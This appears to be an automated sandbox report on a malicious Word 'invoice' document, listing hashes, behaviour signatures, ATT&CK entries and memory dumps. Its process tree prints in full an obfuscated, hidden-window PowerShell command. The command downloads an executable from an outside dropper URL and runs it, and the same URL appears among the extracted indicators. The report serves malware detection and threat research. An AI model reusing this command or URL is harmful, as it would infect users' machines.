Overview

overview

10

Static

static

8

Invoice- 0...42.doc

windows7_x64

10

Invoice- 0...42.doc

windows10_x64

10

Analysis

  • max time kernel
    102s
  • max time network
    95s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    14-10-2021 08:09

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Invoice- 0535254 Oil_Field_4568742.doc

  • Size

    55KB

  • MD5

    e70320db1a53b3226e73d2b8124b2073

  • SHA1

    119ac671f8030a7395030273931120b6e52b3d4d

  • SHA256

    4821e3c96ac5b45216470c24fe904e41c6060e8b392ed6265807b4c59e6d39b1

  • SHA512

    c964a9a959a224d938b8251b97fe3a31483d8eca5eeaa7886450e44d048ecc30c52331158865f33e14b03f03cc7ea236ae6f69b7760eb25bb414b829a59f8df6

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://secure04sd.my03.com/a/oleApp13.exe

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
    adwarespyware
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Invoice- 0535254 Oil_Field_4568742.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1940
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Public\Documents\questionpolitics.cmd" "
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1868
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -w hi sleep -Se 31;Start-BitsTransfer -Source htt`ps://secure04sd.my03.com/a/oleApp13.e`xe -Destination C:\Users\Public\Documents\happyalmost.e`xe;C:\Users\Public\Documents\happyalmost.e`xe
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1312
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:992

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    Modify Registry

    1
    T1112

    Credential Access

    Discovery

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Public\Documents\questionpolitics.cmd
      MD5

      5f4bcdc965cc9739a817de56d7ca2846

      SHA1

      24d45c0d986d4ba7074da5f671d5288626dba3c3

      SHA256

      7a16b7becdfe4e0598f559ab176ac97641ec0030b7da324b7dd2e659b20bec9d

      SHA512

      9694cdb38eba0bccf109fe036aef3067f7d132a747738b1e7284cde76e2e90cd07bf4fce5a588cc3eee9a7ffa0731efc91692232a3e83eaad797068f6803f371

      Download Submit
    • memory/992-92-0x000007FEFBB31000-0x000007FEFBB33000-memory.dmp
      Filesize

      8KB

      Download
    • memory/992-91-0x0000000000000000-mapping.dmp
      Download
    • memory/1312-72-0x0000000004850000-0x0000000004851000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1312-76-0x0000000005640000-0x0000000005641000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1312-110-0x00000000064F0000-0x00000000064F1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1312-65-0x0000000000000000-mapping.dmp
      Download
    • memory/1312-67-0x0000000002170000-0x0000000002171000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1312-68-0x0000000004900000-0x0000000004901000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1312-69-0x0000000004902000-0x0000000004903000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1312-70-0x0000000004940000-0x0000000004941000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1312-71-0x0000000002490000-0x0000000002491000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1312-109-0x00000000064E0000-0x00000000064E1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1312-75-0x000000007EF30000-0x000000007EF31000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1312-95-0x0000000005900000-0x0000000005901000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1312-81-0x0000000005680000-0x0000000005681000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1312-82-0x00000000062E0000-0x00000000062E1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1312-89-0x00000000057E0000-0x00000000057E1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1312-90-0x0000000006370000-0x0000000006371000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1312-93-0x00000000055F0000-0x00000000055F1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1868-63-0x0000000000000000-mapping.dmp
      Download
    • memory/1940-60-0x000000006FF11000-0x000000006FF13000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1940-61-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

      Download
    • memory/1940-59-0x0000000072491000-0x0000000072494000-memory.dmp
      Filesize

      12KB

      Download
    • memory/1940-62-0x0000000075C31000-0x0000000075C33000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1940-111-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

      Download